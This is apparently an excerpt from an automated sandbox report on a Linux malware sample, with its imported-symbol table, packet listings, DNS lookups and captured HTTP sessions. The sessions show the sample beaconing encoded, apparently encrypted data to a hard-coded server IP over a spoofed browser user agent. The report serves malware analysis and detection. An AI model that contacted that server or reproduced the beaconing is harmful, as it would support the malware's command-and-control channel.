                          pthread_mutex_unlockGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_selfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_setspecificGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          pthread_sigmaskGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setegidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          seteuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setgroupsGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setregidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setresgidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setresuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setreuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          setuidGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          sigactionGLIBC_2.2.5libpthread.so.0.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          sigaddsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          sigemptysetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          sigfillsetGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          sigismemberGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          stderrGLIBC_2.2.5libc.so.6.dynsym0x00OBJECT<unknown>DEFAULTSHN_UNDEF
                          strerrorGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          sysconfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          unsetenvGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF
                          vfprintfGLIBC_2.2.5libc.so.6.dynsym0x00FUNC<unknown>DEFAULTSHN_UNDEF

                          Download Network PCAP: filteredfull

                          • Total Packets: 42
                          • 80 (HTTP)
                          • 53 (DNS)
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 21, 2025 13:03:12.230945110 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.414491892 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.414639950 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.418467999 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.591212988 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.591325045 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.594507933 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.594552994 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.594609976 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.594623089 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.594623089 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.594647884 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.594660044 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.594685078 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.594690084 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.594738007 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.594824076 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.597568035 CET4427280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.606985092 CET4427480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.770061970 CET8044272142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.782269001 CET8044274142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:12.782481909 CET4427480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.785612106 CET4427480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:12.958039999 CET8044274142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.043289900 CET8044274142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.043314934 CET8044274142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.043514013 CET4427480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.045388937 CET4427480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.046910048 CET4427680192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.216902971 CET8044274142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.218152046 CET8044276142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.218441010 CET4427680192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.220627069 CET4427680192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.391623974 CET8044276142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.395554066 CET8044276142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.395664930 CET4427680192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.395682096 CET8044276142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:13.398067951 CET4427680192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:13.571724892 CET8044276142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:23.408313036 CET4427880192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:23.577909946 CET8044278142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:23.578191042 CET4427880192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:23.580728054 CET4427880192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:23.750734091 CET8044278142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:23.755933046 CET8044278142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:23.755973101 CET8044278142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:23.756056070 CET4427880192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:23.760303974 CET4427880192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:23.930526018 CET8044278142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:32.770458937 CET4428080192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:32.943046093 CET8044280142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:32.943160057 CET4428080192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:32.946372986 CET4428080192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:33.120156050 CET8044280142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:33.122598886 CET8044280142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:33.122613907 CET8044280142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:33.122751951 CET4428080192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:33.126065969 CET4428080192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:33.298151970 CET8044280142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:42.136138916 CET4428280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:42.309564114 CET8044282142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:42.309925079 CET4428280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:42.313136101 CET4428280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:42.483270884 CET8044282142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:42.487103939 CET8044282142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:42.487195969 CET8044282142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:42.487365961 CET4428280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:42.491214037 CET4428280192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:42.666644096 CET8044282142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:53.502959967 CET4428480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:54.533081055 CET4428480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:54.713149071 CET8044284142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:54.713409901 CET4428480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:54.716978073 CET4428480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:54.896466970 CET8044284142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:54.899370909 CET8044284142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:54.899403095 CET8044284142.93.165.203192.168.2.13
                          Mar 21, 2025 13:03:54.899457932 CET4428480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:54.902545929 CET4428480192.168.2.13142.93.165.203
                          Mar 21, 2025 13:03:55.081197023 CET8044284142.93.165.203192.168.2.13
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 21, 2025 13:05:54.209306955 CET5032453192.168.2.131.1.1.1
                          Mar 21, 2025 13:05:54.209424973 CET3807853192.168.2.131.1.1.1
                          Mar 21, 2025 13:05:54.311609983 CET53380781.1.1.1192.168.2.13
                          Mar 21, 2025 13:05:54.313183069 CET53503241.1.1.1192.168.2.13
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Mar 21, 2025 13:05:54.209306955 CET192.168.2.131.1.1.10xdb53Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                          Mar 21, 2025 13:05:54.209424973 CET192.168.2.131.1.1.10x4dfeStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Mar 21, 2025 13:05:54.313183069 CET1.1.1.1192.168.2.130xdb53No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                          Mar 21, 2025 13:05:54.313183069 CET1.1.1.1192.168.2.130xdb53No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                          • 142.93.165.203
                          Session IDSource IPSource PortDestination IPDestination Port
                          0192.168.2.1344272142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:12.418467999 CET1804OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 1608
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 4e 6a 67 32 5a 54 45 32 4f 44 51 74 4f 57 59 30 4d 53 30 30 59 54 49 35 4c 57 4a 6a 5a 44 67 74 4e 6d 59 32 4f 54 6b 30 59 7a 51 77 59 32 55 34 59 43 2b 45 6c 45 44 35 74 4b 73 42 39 54 53 77 51 42 48 50 77 30 6e 53 47 72 6b 6f 4c 57 70 59 37 47 41 54 30 61 51 45 42 59 50 33 6b 5a 70 53 7a 4b 35 71 6c 49 77 42 74 49 7a 56 2b 70 79 72 36 52 4c 34 4a 6d 65 2b 78 63 56 37 61 51 50 35 64 6e 35 46 73 57 43 6c 6b 36 38 54 62 30 42 4c 63 4b 4f 5a 31 69 68 6d 76 4a 45 34 35 62 6c 48 49 50 6e 63 71 6a 55 48 38 72 78 47 43 5a 4f 75 55 55 69 6f 4e 74 5a 5a 73 53 69 30 6b 6d 55 41 5a 2f 6c 77 52 62 30 54 4b 75 4a 78 4b 76 6a 6e 63 69 79 65 58 38 50 4f 35 56 2f 46 6d 6d 75 31 42 4a 71 61 4e 58 42 64 69 48 68 49 78 34 76 49 7a 35 68 75 51 65 50 36 7a 43 30 77 52 4d 4b 58 54 66 77 41 63 52 69 72 57 64 36 64 62 72 4c 71 4b 6c 74 30 68 73 43 6e 54 6a 41 5a 38 51 4b 78 6d 55 69 50 39 72 42 6e 55 71 59 54 6c 42 75 45 4d 46 50 68 57 30 56 30 77 58 43 56 64 6f 71 47 54 45 61 39 34 67 64 37 49 72 4c 39 30 38 46 39 61 41 [TRUNCATED]
                          Data Ascii: Njg2ZTE2ODQtOWY0MS00YTI5LWJjZDgtNmY2OTk0YzQwY2U4YC+ElED5tKsB9TSwQBHPw0nSGrkoLWpY7GAT0aQEBYP3kZpSzK5qlIwBtIzV+pyr6RL4Jme+xcV7aQP5dn5FsWClk68Tb0BLcKOZ1ihmvJE45blHIPncqjUH8rxGCZOuUUioNtZZsSi0kmUAZ/lwRb0TKuJxKvjnciyeX8PO5V/Fmmu1BJqaNXBdiHhIx4vIz5huQeP6zC0wRMKXTfwAcRirWd6dbrLqKlt0hsCnTjAZ8QKxmUiP9rBnUqYTlBuEMFPhW0V0wXCVdoqGTEa94gd7IrL908F9aAMrknXcihdat/PRnxYeTQ/IpyEaA2kr4tM9EmOdAuv8/91pOU3MJpSSjBTa9EOC4w8zc/STwD9YYsmY8z31GtWC307y6pbFEbCnQnVDPQveH45C/6Cz/85cCnq1ilJhysplRBRJfn2+BYNb1bp0IsNjwlOtCRf34jpx5zAbo0TD49UiDXW6NCP2bZGpx6b8XwHOHMS/Y+qsDe3gNvoyX7IhCj29UHsQUJQUh5lWAapnSQ1TGednyQtZ7F0QoonnNqU05kH8gmoTwzE8BcUsiOkMw4clXXTaldz4orsU9uLDT+UcYvAYRqvKC7eESjsCtSGN+eEfh/lIosALHL9PW/BeMV8N6i15tag1jOeBTW8D+NOe43ODSyr1W4zeOeNidn46wO7C33M35WIeOWtLKG32jg86Yafec11Gv+ZVJKJ4QdUVx+Y6HFoQECDYU7+ppK6QUEYEfBG8Wp4geheqkeblxQAPwit5+aGDI8jWvG+5sdXfVdDEMg6IMho1X5XJlizqUMpC1b05TsGiF6CDBonAww0QNO0ixPddnP+4u5jJlFDtYpTvseTx8zg5EWn00DH0pOaCPoBLkre9X1Sy4qgjS8QxZVN6t7S3L3uN98mMQdE+npWvQMGRwHVamY2CNyOVkmnHh6q0grwjtPUja6DGt8XftQux1JsH [TRUNCATED]
                          Mar 21, 2025 13:03:12.594507933 CET288INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:12 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Transfer-Encoding: chunked
                          Mar 21, 2025 13:03:12.594552994 CET1254INData Raw: 61 33 30 0d 0a 4e 6a 67 32 5a 54 45 32 4f 44 51 74 4f 57 59 30 4d 53 30 30 59 54 49 35 4c 57 4a 6a 5a 44 67 74 4e 6d 59 32 4f 54 6b 30 59 7a 51 77 59 32 55 34 7a 63 35 32 46 58 56 38 4a 47 7a 7a 74 66 72 30 5a 75 68 71 69 61 49 4a 34 57 32 56 79
                          Data Ascii: a30Njg2ZTE2ODQtOWY0MS00YTI5LWJjZDgtNmY2OTk0YzQwY2U4zc52FXV8JGzztfr0ZuhqiaIJ4W2VyXRbdOZ4Lz83UXZHTF8ahf3c3eohLK1lqmBjfHSHEMA/pfW2/2cVnyY9RSepMlCLj5RcMDa2A3GfZFZkWwLQbb1A30fyo5/PgpFHq2j6mSE9ytxcV9g96mT+XoOuYv02dVRRKEksvyY19E33xajpfdrvQ9L6ugdKJj
                          Mar 21, 2025 13:03:12.594609976 CET1254INData Raw: 51 63 6c 69 72 45 6b 66 34 30 71 43 4c 55 5a 74 58 32 64 79 6b 78 67 61 77 4b 65 6c 68 57 4b 48 43 72 63 56 4e 4e 55 67 4e 51 4f 6a 6b 62 64 74 6b 59 6c 6a 75 4f 55 4c 65 4c 43 4c 32 59 78 63 54 4c 62 63 6b 4e 30 4d 72 58 42 36 73 72 69 48 6b 55
                          Data Ascii: QclirEkf40qCLUZtX2dykxgawKelhWKHCrcVNNUgNQOjkbdtkYljuOULeLCL2YxcTLbckN0MrXB6sriHkUOKXHdkOxOyNZeueWJu5Wkr+n7h6UYlbUCAXqMe/A6mqydqSIxLysbG3IDEB3NHPWluGr3oypVdXHRoh+K+XntnSktCtCnD9n3U9vzpkAbmP8n233WQT4PE/YLZemuXmFmmHIpJZBJJ9g0RfvfBeMpqPR3zSZo1dEv
                          Mar 21, 2025 13:03:12.594647884 CET143INData Raw: 47 6f 70 72 4c 45 30 51 76 33 47 2b 48 6d 2f 52 36 72 72 58 67 2b 44 79 33 35 51 42 73 57 72 55 42 49 63 73 32 64 78 53 67 7a 74 6c 65 4a 6d 36 47 72 50 75 32 48 71 31 74 78 48 56 72 55 7a 69 37 30 70 74 72 58 47 44 35 70 6a 76 73 37 6e 77 6e 75
                          Data Ascii: GoprLE0Qv3G+Hm/R6rrXg+Dy35QBsWrUBIcs2dxSgztleJm6GrPu2Hq1txHVrUzi70ptrXGD5pjvs7nwnuM3nZ07RXFPy/bov5MCxQuSpKY03OVoGtTOtw5k/i0UiNqS+
                          Mar 21, 2025 13:03:12.594685078 CET17INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination Port
                          1192.168.2.1344274142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:12.785612106 CET971OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 776
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 4f 57 46 6a 4f 44 51 35 4e 57 4d 74 4e 54 63 31 4d 79 30 30 59 32 4e 69 4c 57 46 69 4d 47 51 74 4e 44 6c 6c 59 6d 55 79 59 57 4a 68 59 7a 45 78 4b 6c 63 4b 58 66 67 32 4a 54 4d 52 76 4f 38 4f 65 55 6d 71 50 43 6c 46 77 36 57 7a 61 49 64 39 56 51 53 32 4a 63 36 53 57 73 63 73 53 34 6c 43 41 4a 6c 4e 69 7a 72 33 77 61 77 53 6a 58 58 75 75 53 54 4c 4e 45 71 53 79 61 39 46 63 4a 4f 59 45 37 6d 32 33 64 6a 6f 6d 5a 48 6c 6e 79 41 47 75 6d 36 7a 41 38 32 78 6e 54 43 62 39 59 69 31 57 72 47 68 57 72 31 67 67 59 50 6d 4e 4c 75 48 50 36 5a 4f 37 66 6b 63 31 39 47 64 7a 52 4f 50 58 5a 51 4c 59 69 77 7a 66 37 4d 31 47 5a 35 44 43 53 67 36 35 71 75 36 4f 73 38 79 50 45 59 72 70 77 67 77 55 6a 72 72 57 63 65 49 70 6c 54 46 4d 50 37 41 50 42 36 57 71 76 37 74 32 48 6e 4b 65 56 58 42 53 30 6f 52 6f 6d 57 70 6e 6a 6b 77 47 37 5a 74 4b 59 37 59 37 52 47 58 5a 71 35 4b 33 6a 46 38 64 58 76 69 4e 6d 2b 70 2f 76 47 7a 42 35 46 6a 78 59 2b 7a 42 6a 34 75 6c 45 6c 6e 54 42 2b 5a 42 2b 56 73 68 6b 4a 79 73 6e 43 54 4e 35 [TRUNCATED]
                          Data Ascii: OWFjODQ5NWMtNTc1My00Y2NiLWFiMGQtNDllYmUyYWJhYzExKlcKXfg2JTMRvO8OeUmqPClFw6WzaId9VQS2Jc6SWscsS4lCAJlNizr3wawSjXXuuSTLNEqSya9FcJOYE7m23djomZHlnyAGum6zA82xnTCb9Yi1WrGhWr1ggYPmNLuHP6ZO7fkc19GdzROPXZQLYiwzf7M1GZ5DCSg65qu6Os8yPEYrpwgwUjrrWceIplTFMP7APB6Wqv7t2HnKeVXBS0oRomWpnjkwG7ZtKY7Y7RGXZq5K3jF8dXviNm+p/vGzB5FjxY+zBj4ulElnTB+ZB+VshkJysnCTN5g1RMXWy3SPCaaTL4ndNHzFApD9oyyQ3kFV8rsw2tOJ4TWtzTOGbPTecXpvKVBtzX7DNBKkanXc7KPze4UKJSOzfQWA6kJtWnQ2YskKkrZwmQmPvfxVB6s0V5ysRVK+PI+Y60Pl8WypSLObkG6SETMDgvi9J7Yl5z625iSHZUNIdXx/vYPyQBKaJ19UmFcRBsMhYImIv51J1R6SXSj6bh57MXycKqJITFG8WRO72KCl/Nzcy6hvzA+v9CMxeT0FQVNqimNBnfXzKe+156ONh3syr5HEC5EmWSIllLGZQ0JJwlNMPxASERuHArhT3Fd6rJrTXo8ActB+jjIMtM4G0WZIWQa76/vgBV7kyH7XPvpY53E0Gop48deVK0YB00KlpLkJm2CuLz5jlUmXhG5egYC0Vti4iE8capXgq6Tkq1TRrkoKY0l1TQ==
                          Mar 21, 2025 13:03:13.043289900 CET521INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Length: 240
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:12 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Data Raw: 4f 57 46 6a 4f 44 51 35 4e 57 4d 74 4e 54 63 31 4d 79 30 30 59 32 4e 69 4c 57 46 69 4d 47 51 74 4e 44 6c 6c 59 6d 55 79 59 57 4a 68 59 7a 45 78 53 4c 69 42 67 68 4c 45 46 2f 42 76 71 33 45 6b 66 62 54 44 75 72 75 6a 67 4b 51 79 2f 47 4e 52 50 56 38 51 34 4b 77 61 31 55 6a 44 70 64 61 52 30 30 58 44 6b 52 41 36 35 75 51 74 35 32 76 75 5a 65 41 63 4e 41 6a 4e 45 42 45 64 46 50 7a 62 65 37 6c 38 7a 32 49 54 36 6a 4c 65 54 74 73 59 37 4e 74 54 70 6c 38 6c 4b 57 71 59 7a 33 5a 74 74 59 4b 6a 35 64 49 65 61 6b 63 70 47 4b 56 35 59 37 4a 67 33 4b 56 64 71 70 56 33 4f 76 54 35 4a 6f 4b 39 47 70 75 46 77 61 2b 46 6e 62 37 4d 6e 59 2b 45 6a 4e 42 4d 66 76 4f 4e 4e 56 38 6d 62 6c 51 4e 30 50 70 58 6c 77 61 55 30 71 6a 73
                          Data Ascii: OWFjODQ5NWMtNTc1My00Y2NiLWFiMGQtNDllYmUyYWJhYzExSLiBghLEF/Bvq3EkfbTDurujgKQy/GNRPV8Q4Kwa1UjDpdaR00XDkRA65uQt52vuZeAcNAjNEBEdFPzbe7l8z2IT6jLeTtsY7NtTpl8lKWqYz3ZttYKj5dIeakcpGKV5Y7Jg3KVdqpV3OvT5JoK9GpuFwa+Fnb7MnY+EjNBMfvONNV8mblQN0PpXlwaU0qjs


                          Session IDSource IPSource PortDestination IPDestination Port
                          2192.168.2.1344276142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:13.220627069 CET415OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 220
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 6f 35 55 51 56 47 2f 65 77 31 72 50 2f 6c 30 42 4d 73 52 45 58 4c 73 54 55 65 34 52 30 73 57 56 45 78 4f 66 4d 35 6e 34 34 53 51 33 33 41 62 52 76 70 30 76 4b 31 45 6c 71 4a 65 62 5a 42 78 67 6b 63 33 37 67 49 59 43 4a 42 77 2b 54 44 35 68 6e 69 48 5a 2f 71 35 59 53 73 4c 42 51 76 65 41 45 33 72 61 37 6e 52 64 52 63 36 6e 6c 39 75 6f 4d 37 79 32 52 79 66 30 4c 79 6f 2b 56 52 53 6e 43 48 5a 6b 6c 34 6f 79 54 31 76 51 74 63 47 79 35 50 4e 38 50 79 42 4f 67 63 6b 4e 2f 59 34 79 77 76 67 31 66 51 43 4b 4b 48 67 3d
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1o5UQVG/ew1rP/l0BMsREXLsTUe4R0sWVExOfM5n44SQ33AbRvp0vK1ElqJebZBxgkc37gIYCJBw+TD5hniHZ/q5YSsLBQveAE3ra7nRdRc6nl9uoM7y2Ryf0Lyo+VRSnCHZkl4oyT1vQtcGy5PN8PyBOgckN/Y4ywvg1fQCKKHg=
                          Mar 21, 2025 13:03:13.395554066 CET457INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Length: 176
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:13 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 50 4f 45 47 41 6f 66 73 72 41 42 32 67 71 61 38 4f 5a 65 72 6c 52 6e 75 39 6a 7a 44 74 6d 79 76 2b 52 38 70 6e 73 57 5a 64 53 30 31 51 35 61 45 79 53 70 4c 66 43 54 56 70 2b 57 68 57 45 71 45 54 53 32 6b 72 58 6c 54 71 4a 6f 58 4b 46 68 77 36 52 44 53 74 79 38 6b 4f 73 66 76 58 35 44 2f 70 62 6b 33 71 59 59 6d 62 68 4a 37 48 6a 42 34 53 73 38 34 54 6b 70 6f 55 77 6e 69 58 39 56 35
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1POEGAofsrAB2gqa8OZerlRnu9jzDtmyv+R8pnsWZdS01Q5aEySpLfCTVp+WhWEqETS2krXlTqJoXKFhw6RDSty8kOsfvX5D/pbk3qYYmbhJ7HjB4Ss84TkpoUwniX9V5


                          Session IDSource IPSource PortDestination IPDestination Port
                          3192.168.2.1344278142.93.165.20380
                          TimestampBytes transferredDirectionData
                          Mar 21, 2025 13:03:23.580728054 CET415OUTPOST /data HTTP/1.1
                          Host: 142.93.165.203
                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 220
                          Accept-Encoding: gzip
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 54 68 58 47 7a 50 69 47 66 46 63 75 38 66 68 6a 4f 31 6b 48 44 67 38 45 75 50 32 48 77 42 6f 2f 62 47 5a 52 52 48 6d 79 72 30 5a 65 64 76 65 78 78 6a 2b 4d 54 57 46 46 56 6d 68 2f 32 6b 46 37 42 55 56 58 49 53 4c 69 2b 4b 57 6b 4c 78 74 62 46 47 75 44 72 37 73 53 6f 46 42 47 50 4f 30 51 39 32 2f 4d 63 76 6f 54 6b 46 51 61 31 4b 4d 49 75 4a 71 36 41 36 36 4e 71 4d 65 42 32 4f 55 73 4d 36 35 76 48 32 36 37 41 4f 63 72 75 68 54 55 32 38 70 51 34 51 7a 7a 2f 48 4f 55 69 67 4b 70 59 66 47 4a 44 71 43 6a 69 33 6f 3d
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE1ThXGzPiGfFcu8fhjO1kHDg8EuP2HwBo/bGZRRHmyr0Zedvexxj+MTWFFVmh/2kF7BUVXISLi+KWkLxtbFGuDr7sSoFBGPO0Q92/McvoTkFQa1KMIuJq6A66NqMeB2OUsM65vH267AOcruhTU28pQ4Qzz/HOUigKpYfGJDqCji3o=
                          Mar 21, 2025 13:03:23.755933046 CET457INHTTP/1.1 200 OK
                          Cache-Control: max-age=0, no-cache
                          Content-Length: 176
                          Content-Type: application/javascript; charset=utf-8
                          Content-Type: application/octet-stream
                          Date: Fri, 21 Mar 2025 12:03:23 GMT
                          Pragma: no-cache
                          Server: NetDNA-cache/2.2
                          Connection: close
                          Data Raw: 59 54 55 35 4d 32 52 6d 59 6a 55 74 5a 44 55 35 5a 53 30 30 4e 54 6c 68 4c 57 49 77 4e 7a 49 74 4e 54 67 32 59 7a 4e 6a 4f 57 55 30 4f 47 45 31 30 72 4b 77 69 62 46 5a 70 33 6b 64 75 4a 63 71 4b 58 4b 73 46 5a 43 2b 37 58 45 70 2f 62 44 31 39 56 70 2b 38 38 50 53 2b 74 6a 38 6c 77 31 59 33 34 42 74 45 72 34 62 69 75 42 52 58 53 32 32 48 76 6a 51 73 63 67 43 5a 33 53 73 58 79 4c 79 30 4d 41 43 62 73 43 70 77 41 38 62 56 36 37 47 45 66 39 74 42 47 4b 6f 77 65 59 50 57 35 7a 57 41 49 37 61 2f 68 56 42 53 71 37 7a 45 56 31 46
                          Data Ascii: YTU5M2RmYjUtZDU5ZS00NTlhLWIwNzItNTg2YzNjOWU0OGE10rKwibFZp3kduJcqKXKsFZC+7XEp/bD19Vp+88PS+tj8lw1Y34BtEr4biuBRXS22HvjQscgCZ3SsXyLy0MACbsCpwA8bV67GEf9tBGKoweYPW5zWAI7a/hVBSq7zEV1F


                          Session IDSource IPSource PortDestination IPDestination Port
